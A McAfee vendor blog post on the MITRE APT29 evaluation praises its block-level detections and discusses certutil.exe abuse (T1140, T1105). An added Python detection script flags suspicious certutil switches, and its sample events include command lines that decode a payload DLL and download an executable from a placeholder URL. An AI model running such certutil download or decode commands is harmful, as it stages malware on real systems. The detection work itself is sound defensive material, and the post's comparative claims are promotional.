In our recent Racing Bear blog we emphasized the concept of time-based security and the value that protection delivers to a defender. Blocking an attack does not remove the threat from the equation, but it slows the attacker down and buys valuable time for the defender to respond. There are three reasons for this:

  1. When progress is blocked, the adversary is forced to change approach and try again.
  2. Block-level detections are by nature high-fidelity, which raises their priority for defenders.
  3. Defenders can spend their attention on other high-priority detected events that were not blocked.

As part of the APT29 evaluation, MITRE did not allow vendors to run their products in blocking mode, so that prevention would not interfere with the testing. Vendors could, however, deploy the same protection technologies in a non-blocking (detect-only) mode, which let participants identify the scenarios in which their products would have blocked the attacker.

Block-level detection improved McAfee's results more than those of any other vendor.

MITRE has stated that in future evaluations protection results will get their own category, but in the APT29 evaluation block-level detections were recorded as footnotes, as shown in Figure 1.

MITRE APT29 Evaluation – Importance of prevention in the area of endpoint security
Figure 1 – Example footnote

From the defender's point of view, the more specific a detection is, and the earlier it arrives, the more valuable it is. Applying the time-based security lens, the following diagram shows the detection types used in the evaluation and the moment at which each one delivers its value.

Figure 2 – Moment of value for each type of detection

The MITRE APT29 evaluation consisted of 20 major steps, the same for every participating vendor, covering 57 techniques spread over 134 sub-steps. One step was dropped because of emulation problems, leaving 19 steps.

The following table shows, for each participant, the highest-scoring detection category at every step. Each step represents a key milestone in the adversary emulation and gives the defender an opportunity to protect, detect and respond.

Figure 3 – Detection type with the best coverage at each step

Another view of the same data aggregates each participant's top detection at every step. A "blocked" modifier is applied here as well, so that blocking detections are shown alongside the non-blocking ones.

Table 1 – Final modifier value assignment
Figure 4 – Cumulative time-based protection view

Block-level detection not only improved McAfee's results more than any other vendor's; MVISION Endpoint was also the only solution that reported such detections at multiple stages of the attack.

One timely example of this in action:

  • Step 11 – Initial compromise
    • Technique T1140 (Deobfuscate/Decode Files or Information)
      • A.10 (decoding the payload of the on-disk embedded DLL with certutil.exe)

Living-off-the-land binaries (also called LOLBins) are files that ship with the operating system and can be (ab)used for purposes other than the one they were built for. Adversaries are known to use them to bypass security controls, because these programs are legitimate, signed components that are usually trusted. Several of them can be launched from a macro or from the command line. A popular choice for groups such as APT28, Turla, OilRig and APT10 is certutil.exe. It was originally designed to retrieve certificate information and to configure certificate services, but it can also be used to decode hidden data (T1140) or to download a remote file (T1105).
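The following detection logic is an added example for this post; it is not McAfee's JTI rule and not data from the MITRE evaluation. It scans process-creation events (field names follow Sysmon Event ID 1: Image, OriginalFileName, CommandLine, ParentImage) for the certutil.exe switches that serve T1140 and T1105, and returns a verdict of "block" when the decoded or downloaded output is an executable file type. The events, file names, URL and the block/alert policy are all constructed for illustration.

```python
"""Flag certutil.exe abuse (T1140 decode, T1105 download) in process-creation telemetry.

Added example for this article, not McAfee's JTI rule and not MITRE evaluation data.
Event layout follows Sysmon Event ID 1 field names; all sample events are constructed.
"""
import re
from typing import Dict, List

# certutil switches that have no place in routine certificate work but are the ones
# adversaries reach for, mapped to the ATT&CK technique they usually serve.
SUSPICIOUS_SWITCHES = {
    "decode":    ("T1140", "Deobfuscate/Decode Files or Information"),
    "decodehex": ("T1140", "Deobfuscate/Decode Files or Information"),
    "urlcache":  ("T1105", "Ingress Tool Transfer"),
    "verifyctl": ("T1105", "Ingress Tool Transfer"),
}

# If certutil writes one of these, a payload has just been staged on disk.
# Illustrative block policy for this example, not a product setting.
EXECUTABLE_EXTENSIONS = {".dll", ".exe", ".scr", ".ps1", ".vbs", ".js", ".hta", ".bat", ".cmd"}

_TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line into tokens, keeping quoted paths intact."""
    return [t.strip('"') for t in _TOKEN_RE.findall(cmdline)]


def is_certutil(event: Dict[str, str]) -> bool:
    """True for certutil even when the binary was copied and renamed: a renamed
    copy changes Image, but the PE's OriginalFileName resource still says CertUtil.exe."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    return image == "certutil.exe" or original == "certutil.exe"


def analyze(event: Dict[str, str]) -> List[Dict[str, str]]:
    """Return one finding per suspicious switch, each with an ATT&CK ID and a verdict."""
    if not is_certutil(event):
        return []
    tokens = tokenize(event.get("CommandLine", ""))
    hits: List[str] = []
    for tok in tokens:
        if tok[:1] in ("-", "/"):  # certutil accepts both prefixes, case-insensitively
            switch = tok[1:].lower()
            if switch in SUSPICIOUS_SWITCHES and switch not in hits:
                hits.append(switch)
    if not hits:
        return []
    # For -decode, -decodehex and -urlcache the output file is the last positional argument.
    positional = [t for t in tokens[1:] if t[:1] not in ("-", "/")]
    output = positional[-1] if positional else ""
    basename = output.rsplit("\\", 1)[-1].rsplit("/", 1)[-1]
    ext = basename[basename.rfind("."):].lower() if "." in basename else ""
    verdict = "block" if ext in EXECUTABLE_EXTENSIONS else "alert"
    return [
        {"technique": SUSPICIOUS_SWITCHES[s][0], "name": SUSPICIOUS_SWITCHES[s][1],
         "switch": s, "output": output, "verdict": verdict,
         "parent": event.get("ParentImage", "")}
        for s in hits
    ]


def scan(events: List[Dict[str, str]]) -> List[List[Dict[str, str]]]:
    """Run analyze() over a batch of events, preserving order."""
    return [analyze(e) for e in events]


# Constructed sample events (not from the evaluation). Paths, names and URL are made up.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -decode C:\Users\victim\AppData\Local\Temp\kb.tmp C:\Users\victim\AppData\Local\Temp\kb.dll"},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\cu.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\Users\victim\AppData\Local\Temp\cu.exe" /DecodeHex payload.hex payload.exe'},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f https://example.invalid/update/svc.exe C:\ProgramData\svc.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -decode notes.b64 notes.txt"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -verify -urlfetch C:\certs\server.cer"},
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c dir"},
]

if __name__ == "__main__":
    for event, findings in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        for f in findings:
            print(f"{f['verdict'].upper():5} {f['technique']} ({f['switch']}) -> {f['output']}  parent={f['parent']}")
```

The first four events produce findings (three "block" verdicts for .dll/.exe outputs, one "alert" for a text decode); the legitimate certificate check and the unrelated cmd.exe event produce none. Checking OriginalFileName as well as Image is the detail worth keeping: a copied and renamed certutil would otherwise walk past a rule that only matches the image path.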

At the time of writing, MITRE lists 70 references for T1140, which shows how widely the technique is used by adversaries. Figures 5 and 6 were captured during the evaluation of this technique.

Figure 5 – JTI rule preventing direct instantiation of the living-off-the-land attack with certutil.exe during step 11.A.10
Figure 6 – JTI rule preventing direct instantiation of the living-off-the-land attack with certutil.exe during step 11

Although this coverage was delivered by MVISION Endpoint, McAfee Endpoint Security 10.7 uses the same technology.

In the end it comes down to time. The MITRE APT29 evaluation demonstrated McAfee's time-based protection and the difference that McAfee's block-level detections make. Buying time by putting a speed bump on Cozy Bear's speedway can make all the difference in winning the security race.

* All data can be found at https://attackevals.mitre.org/evaluations.html?round=APT29.

2018–2020 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.
